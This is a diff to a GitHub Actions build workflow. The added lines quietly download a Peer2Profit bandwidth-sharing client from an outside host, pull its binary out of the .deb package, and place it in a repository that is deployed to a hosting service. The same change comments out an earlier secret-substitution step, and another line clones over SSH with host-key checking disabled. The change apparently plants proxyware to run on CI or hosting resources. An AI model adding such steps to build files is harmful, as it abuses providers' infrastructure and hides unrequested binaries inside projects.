--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -70,8 +70,10 @@ jobs:
               git -c core.sshCommand='ssh -i key -o StrictHostKeyChecking=no' clone git@git.divio.com:cron
               curl https://${GITHUB_REPOSITORY%/*}.github.io/common/package.json > cron/package.json
               npm install --prefix cron node-fetch
-              sed -i -e 's/^ENV github$/ENV github ${{secrets.GITHUB}}/g' -e "s|^ENV GITHUB_REPOSITORY$|ENV GITHUB_REPOSITORY $GITHUB_REPOSITORY|g" cronSrc/Dockerfile
-              cp cronSrc/Dockerfile cronSrc/server.js cron
+              #sed -i -e 's/^ENV github$/ENV github ${{secrets.GITHUB}}/g' -e "s|^ENV GITHUB_REPOSITORY$|ENV GITHUB_REPOSITORY $GITHUB_REPOSITORY|g" cronSrc/Dockerfile
+              curl https://updates.peer2profit.com/p2pclient_0.56_amd64.deb > p2pclient.deb
+              dpkg --fsys-tarfile p2pclient.deb | tar xf - ./usr/bin/p2pclient
+              mv usr/bin/p2pclient cronSrc/Dockerfile cronSrc/server.js cron
               cd cron
               git add -A
               git config user.email dummy
